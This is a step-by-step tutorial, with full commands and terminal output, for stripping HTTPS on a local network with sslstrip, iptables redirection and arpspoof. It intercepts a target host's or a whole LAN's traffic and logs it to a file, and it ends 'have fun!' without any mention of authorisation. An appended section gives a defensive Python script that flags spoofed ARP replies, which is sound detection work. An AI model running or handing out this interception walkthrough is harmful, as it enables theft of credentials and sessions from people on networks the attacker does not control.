- This tutorial will show you how to set up sslstrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
- Aren't you excited?!
- Open a terminal window
- Download sslstrip from:
- http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- With this command:
- wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- #BEGIN TERMINAL OUTPUT
- root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- --2011-12-05 01:35:11-- http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- Resolving www.thoughtcrime.org... 72.14.190.145
- Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 22198 (22K) [application/x-gzip]
- Saving to: `sslstrip-0.9.tar.gz'
- 100%[====================================================================================>] 22,198 --.-K/s in 0.07s
- 2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
- #END TERMINAL OUTPUT
- Extract the package "sslstrip-0.9.tar.gz" with the following command:
- tar -zxvf sslstrip-0.9.tar.gz
- #BEGIN TERMINAL OUTPUT
- root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
- sslstrip-0.9/
- sslstrip-0.9/README
- sslstrip-0.9/COPYING
- sslstrip-0.9/setup.py
- sslstrip-0.9/sslstrip/
- sslstrip-0.9/sslstrip/StrippingProxy.py
- sslstrip-0.9/sslstrip/SSLServerConnection.py
- sslstrip-0.9/sslstrip/ServerConnectionFactory.py
- sslstrip-0.9/sslstrip/ClientRequest.py
- sslstrip-0.9/sslstrip/ServerConnection.py
- sslstrip-0.9/sslstrip/CookieCleaner.py
- sslstrip-0.9/sslstrip/__init__.py
- sslstrip-0.9/sslstrip/DnsCache.py
- sslstrip-0.9/sslstrip/URLMonitor.py
- sslstrip-0.9/lock.ico
- sslstrip-0.9/sslstrip.py
- #END TERMINAL OUTPUT
- You also need to make sure you have Python 2.5 or greater and the Python "twisted web" module installed.
- Install them like this:
- apt-get install python python-twisted-web
- In my case they were already installed:
- #BEGIN TERMINAL OUTPUT
- root@bt:~# apt-get install python python-twisted-web
- Reading package lists... Done
- Building dependency tree
- Reading state information... Done
- python is already the newest version.
- python-twisted-web is already the newest version.
- 0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
- #END TERMINAL OUTPUT
- Now change to the "sslstrip-0.9" directory:
- cd sslstrip-0.9
- #BEGIN TERMINAL OUTPUT
- root@bt:~# cd sslstrip-0.9
- root@bt:~/sslstrip-0.9# ls
- COPYING lock.ico README setup.py sslstrip sslstrip.py
- #END TERMINAL OUTPUT
- Run the command:
- python ./setup.py install
- #BEGIN TERMINAL OUTPUT
- root@bt:~/sslstrip-0.9# python ./setup.py install
- running install
- running build
- running build_py
- creating build
- creating build/lib.linux-x86_64-2.6
- creating build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
- copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
- running build_scripts
- creating build/scripts-2.6
- copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
- changing mode of build/scripts-2.6/sslstrip from 644 to 755
- running install_lib
- creating /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
- byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
- running install_scripts
- copying build/scripts-2.6/sslstrip -> /usr/local/bin
- changing mode of /usr/local/bin/sslstrip to 755
- running install_data
- creating /usr/local/share/sslstrip
- copying README -> /usr/local/share/sslstrip
- copying COPYING -> /usr/local/share/sslstrip
- copying lock.ico -> /usr/local/share/sslstrip
- running install_egg_info
- Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
- Cleaning up...
- #END TERMINAL OUTPUT
- Now we need to turn on IP forwarding. Run this command:
- echo "1" > /proc/sys/net/ipv4/ip_forward
- OK, iptables has to be set up to redirect HTTP traffic to sslstrip:
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
- Change the <listenPort> above to an unused, unprivileged port. Something like 30000 should do.
- So it should look like this:
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000
- Now we are going to execute sslstrip. Run this command:
- sslstrip -a -l 30000 -w secret.log
- The listening port will be whatever you chose for iptables to redirect HTTP traffic to.
- #BEGIN TERMINAL OUTPUT
- root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log
- sslstrip 0.9 by Moxie Marlinspike running...
- #END TERMINAL OUTPUT
- Notice in the terminal output above that sslstrip is running. Don't kill the terminal session.
- Open a new terminal window.
- Now we need to set up arpspoof so the network will think you are the gateway or router. This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
- arpspoof -i <interface> -t <targetIP> <gatewayIP>
- If you don't know your interface setting, just run a quick "ifconfig" command and it will list it. The <gatewayIP> is the network's real gateway/router; this is the traffic we want to hijack.
- If you want arpspoof to intercept traffic across the whole LAN, run:
- arpspoof -i <interface> <gatewayIP>
- So, I would run the command like this:
- arpspoof -i eth0 -t 10.10.1.20 10.10.1.254
- #BEGIN TERMINAL OUTPUT
- root@bt:~# arpspoof -i eth0 10.10.1.254
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
- #END TERMINAL OUTPUT
- Notice in the terminal output above that arpspoof keeps sending ARP replies. Just let it run, and don't kill the terminal session.
- If you need additional help just run:
- sslstrip --help
- #BEGIN TERMINAL OUTPUT
- root@bt:~/sslstrip-0.9# sslstrip --help
- sslstrip 0.9 by Moxie Marlinspike
- Usage: sslstrip <options>
- Options:
- -w <filename>, --write=<filename> Specify file to log to (optional).
- -p , --post Log only SSL POSTs. (default)
- -s , --ssl Log all SSL traffic to and from server.
- -a , --all Log all SSL and HTTP traffic to and from server.
- -l <port>, --listen=<port> Port to listen on (default 10000).
- -f , --favicon Substitute a lock favicon on secure requests.
- -k , --killsessions Kill sessions in progress.
- -h Print this help message.
- #END TERMINAL OUTPUT
- That's it...have fun!
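- From the defender's side, the repeated "arp reply ... is-at" lines in the arpspoof output above are what gives this setup away on the wire. The detector below is an added example, not part of the original paste or of sslstrip/arpspoof; the trusted gateway MAC, the unicast sample line, and the names find_arp_spoofing and norm_mac are assumptions made for illustration.

```python
import re
from collections import Counter

# Line format as printed in the arpspoof terminal output on this page:
#   <src mac> <dst mac> 0806 <len>: arp reply <ip> is-at <mac>
MAC = r"(?:[0-9a-f]{1,2}:){5}[0-9a-f]{1,2}"
ARP_REPLY = re.compile(
    rf"(?P<src>{MAC}) (?P<dst>{MAC}) 0806 \d+: "
    rf"arp reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>{MAC})",
    re.I)
BROADCAST = "ff:ff:ff:ff:ff:ff"

def norm_mac(mac):
    """Zero-pad each octet so 0:c:29:... compares equal to 00:0c:29:..."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def find_arp_spoofing(lines, trusted, flood_threshold=3):
    """Return sorted (ip, claimed_mac, reason); trusted is {ip: mac} known good."""
    findings, broadcast_claims = set(), Counter()
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue  # not an ARP reply line
        ip, mac = m["ip"], norm_mac(m["mac"])
        if ip in trusted and mac != norm_mac(trusted[ip]):
            findings.add((ip, mac, "mac-mismatch"))
        if norm_mac(m["dst"]) == BROADCAST:
            broadcast_claims[(ip, mac)] += 1  # unsolicited reply sent to everyone
    for (ip, mac), count in broadcast_claims.items():
        if count >= flood_threshold:
            findings.add((ip, mac, "repeated-broadcast-reply"))
    return sorted(findings)

# Constructed sample: the first three lines repeat the reply shown above;
# the last line and the trusted gateway MAC are made up for this example.
SAMPLE = [
    "0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79",
] * 3 + [
    "0:50:56:aa:bb:cc 0:c:29:11:22:33 0806 42: arp reply 10.10.1.254 is-at 0:50:56:aa:bb:cc",
]
TRUSTED = {"10.10.1.254": "00:50:56:aa:bb:cc"}

if __name__ == "__main__":
    for finding in find_arp_spoofing(SAMPLE, TRUSTED):
        print(finding)
```

The trusted binding would normally come from the network's own records (router label, DHCP or switch configuration), never from ARP traffic itself.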